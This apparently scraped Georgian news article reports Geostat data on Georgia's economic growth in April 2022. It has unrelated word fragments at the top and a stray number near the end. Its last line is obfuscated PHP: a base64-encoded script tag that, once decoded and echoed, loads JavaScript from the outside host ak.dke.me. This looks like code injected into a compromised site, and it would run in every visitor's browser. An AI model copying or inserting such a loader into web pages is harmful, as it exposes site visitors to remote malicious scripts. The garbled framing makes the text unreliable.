celsiusi
ავერსი შნაიდერი
2022 წლის აპრილში საქართველოს ეკონომიკა 2.6%-ით გაიზარდა, ამის შესახებ სტატისტიკის ეროვნული სამსახურის მიერ დღეს გამოქვეყნებული ანგარიშიდან ხდება ცნობილი. დოკუმენტის თანახმად, 2022 წლის პირველ 4 თვეში ეკონომიკური ზრდა 10.8% იყო.
 
"2022 წლის აპრილში, წინა წლის შესაბამის პერიოდთან შედარებით ზრდა შეინიშნებოდა შემდეგ დარგებში: ტრანსპორტი და დასაწყობება, სასტუმროები და რესტორნები, ელექტროენერგიის, აირის, ორთქლის და კონდიცირებული ჰაერის მიწოდება, საფინანსო და სადაზღვევო საქმიანობა, ხელოვნება, გართობა და დასვენება, სამთომოპოვებითი მრეწველობა.
 
კლების ტენდენცია დაფიქსირდა მშენებლობის, დამამუშავებელი მრეწველობის, პროფესიული, სამეცნიერო, ტექნიკური საქმიანობებისა და ვაჭრობის დარგებში,"- ნათქვამია საქსტატის ანგარიშში.
 
აპრილის განმავლობაში საქართველოს კერძო სექტორის (დღგ-ის გადამხდელი კომპანიების) ბრუნვამ 9.7 მილიარდი ლარი შეადგინა, რაც წინა წელთან შედარებით 11.7%-ით მეტია.
 
ეკონომიკურ ზრდაზე ასევე დადებითი გავლენა მოახდინა 32.8%-ით გაზრდილმა ექსპორტმა.
646
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");